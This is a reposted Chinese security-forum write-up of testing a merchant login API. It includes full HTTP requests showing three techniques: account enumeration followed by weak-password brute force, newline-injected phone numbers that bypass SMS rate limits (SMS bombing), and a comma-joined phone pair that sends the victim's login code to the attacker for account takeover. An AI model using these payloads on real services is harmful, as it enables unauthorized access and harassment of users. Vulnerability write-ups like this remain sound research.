设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 一个有趣的手机验证码挖掘姿势
返回列表 发新帖
查看: 2370|回复: 0

一个有趣的手机验证码挖掘姿势

[复制链接]
Delina

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2022-1-14 09:25:15 | 显示全部楼层 |阅读模式
本帖最后由 Delina 于 2022-1-14 09:27 编辑

原文链接:一个有趣的手机验证码挖掘姿势

一、背景测试某个登录接口如下
账号密码登录:

手机验证登录:

已知账号密码登录处的账号为手机号
二、详情1.账号密码登录
随意输入账号、密码,提示手机号未进行注册

bp抓取数据包,请求和响应如下

根据此提示,获得线索1-账号为手机号。
输入经典手机号18888888888,根据响应得到存在的账户,获得线索2-账户
  1. POST /merchant/account/loginByPassword HTTP/1.1
  2. Host: merchant.xxx.net
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  4. Accept: application/json, text/plain, */*
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/json;charset=utf-8
  8. Clientid: web
  9. Authorization: [object Object]
  10. Token: [object Object]
  11. Content-Length: 41
  12. Origin: https://www.xxx.net
  13. Referer: https://www.xxx.net/
  14. Sec-Fetch-Dest: empty
  15. Sec-Fetch-Mode: cors
  16. Sec-Fetch-Site: same-site
  17. Te: trailers
  18. Connection: close

  20. {"mobile":"18888888888","password":"222"}


  23. HTTP/1.1 200
  24. Date: Tue, 28 Dec 2021 10:48:40 GMT
  25. Content-Type: application/json
  26. Connection: close
  27. Set-Cookie: acw_tc=2760824d16406885206401191e2c1dd84766a8b1a792d2e2bb2ce3399d15a5;path=/;HttpOnly;Max-Age=1800
  28. Server: Tengine/2.1.2
  29. Vary: Accept-Encoding
  30. Access-Control-Allow-Credentials: true
  31. Access-Control-Allow-Origin: https://www.xxx.net
  32. Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  33. Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  34. Content-Length: 120

  36. {"status":999999,"code":999999,"err":"用户名或密码错误,该账号还可重试4次","data":null,"success":false}
复制代码

经测试,无爆破次数限制。
根据线索1+线索2=攻击路径1:使用手机号字典爆破根据返回内容得到存在账户,之后设置1个账户对应5个弱密码批量爆破进入系统。
2.手机登录测试
输入手机号点击获取验证码
发送请求
  1. POST /merchant/account/sendSmsCodeForLogin HTTP/1.1
  2. Host: merchant.xxx.net
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  4. Accept: application/json, text/plain, */*
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/json;charset=utf-8
  8. Clientid: web
  9. Authorization: [object Object]
  10. Token: [object Object]
  11. Content-Length: 24
  12. Origin: https://www.xxx.net
  13. Referer: https://www.xxx.net/
  14. Sec-Fetch-Dest: empty
  15. Sec-Fetch-Mode: cors
  16. Sec-Fetch-Site: same-site
  17. Te: trailers
  18. Connection: close

  20. {"mobile":"18888888888"}
复制代码

得到响应
  1. HTTP/1.1 200
  2. Date: Tue, 28 Dec 2021 10:57:48 GMT
  3. Content-Type: application/json
  4. Connection: close
  5. Set-Cookie: acw_tc=2760820516406890685573135e310db030eef4f8c8c2014c8eac375434e045;path=/;HttpOnly;Max-Age=1800
  6. Server: Tengine/2.1.2
  7. Vary: Accept-Encoding
  8. Access-Control-Allow-Credentials: true
  9. Access-Control-Allow-Origin: https://www.xxx.net
  10. Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  11. Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  12. Content-Length: 59

  14. {"status":0,"code":0,"err":null,"data":null,"success":true}
复制代码

根据以上响应猜测验证码发送成功
再次发送请求,得到响应
  1. HTTP/1.1 200
  2. Date: Tue, 28 Dec 2021 10:57:51 GMT
  3. Content-Type: application/json
  4. Connection: close
  5. Set-Cookie: acw_tc=2760820f16406890715673508e598e9180d08a0a3810cf50015a47726b17fd;path=/;HttpOnly;Max-Age=1800
  6. Server: Tengine/2.1.2
  7. Vary: Accept-Encoding
  8. Access-Control-Allow-Credentials: true
  9. Access-Control-Allow-Origin: https://www.xxx.net
  10. Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  11. Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  12. Content-Length: 104

  14. {"status":999999,"code":999999,"err":"每分钟只能发送一次验证码","data":null,"success":false}
复制代码

根据响应得知存在发送限制,尝试绕过,修改请求为{"mobile":"18888888888\n"}进行重放
  1. POST /merchant/account/sendSmsCodeForLogin HTTP/1.1
  2. Host: merchant.xxx.net
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  4. Accept: application/json, text/plain, */*
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/json;charset=utf-8
  8. Clientid: web
  9. Authorization: [object Object]
  10. Token: [object Object]
  11. Content-Length: 24
  12. Origin: https://www.xxx.net
  13. Referer: https://www.xxx.net/
  14. Sec-Fetch-Dest: empty
  15. Sec-Fetch-Mode: cors
  16. Sec-Fetch-Site: same-site
  17. Te: trailers
  18. Connection: close

  20. {"mobile":"18888888888\n"}
复制代码

得到响应
  1. HTTP/1.1 200
  2. Date: Tue, 28 Dec 2021 10:57:48 GMT
  3. Content-Type: application/json
  4. Connection: close
  5. Set-Cookie: acw_tc=2760820516406890685573135e310db030eef4f8c8c2014c8eac375434e045;path=/;HttpOnly;Max-Age=1800
  6. Server: Tengine/2.1.2
  7. Vary: Accept-Encoding
  8. Access-Control-Allow-Credentials: true
  9. Access-Control-Allow-Origin: https://www.xxx.net
  10. Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  11. Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  12. Content-Length: 59

  14. {"status":0,"code":0,"err":null,"data":null,"success":true}
复制代码

持续修改{"mobile":"18888888888\n\n"}
持续得到响应成功。
替换为真实手机号,验证存在短信炸弹。
尝试新姿势,修改请求为2个不同手机号
  1. POST /merchant/account/sendSmsCodeForLogin HTTP/1.1
  2. Host: merchant.xxx.net
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  4. Accept: application/json, text/plain, */*
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/json;charset=utf-8
  8. Clientid: web
  9. Authorization: [object Object]
  10. Token: [object Object]
  11. Content-Length: 24
  12. Origin: https://www.xxx.net
  13. Referer: https://www.xxx.net/
  14. Sec-Fetch-Dest: empty
  15. Sec-Fetch-Mode: cors
  16. Sec-Fetch-Site: same-site
  17. Te: trailers
  18. Connection: close

  20. {"mobile":"18888888888,16666666666"}
复制代码

得到响应成功

替换为真实手机号,得到相同验证码。

然后,只需要把手机号第一位换成存在用户,第二位换成自己的手机号,点击发送,就可以得到相同验证码,实现任意用户登录。

三、总结漏洞1(常规):暴力破解---爆破用户名、爆破密码
漏洞2(常规):短信炸弹---\n\r等字符绕过
漏洞3(亮点):任意用户登录---同时输入两个手机号获取同一验证码


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 19:21 , Processed in 0.012684 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表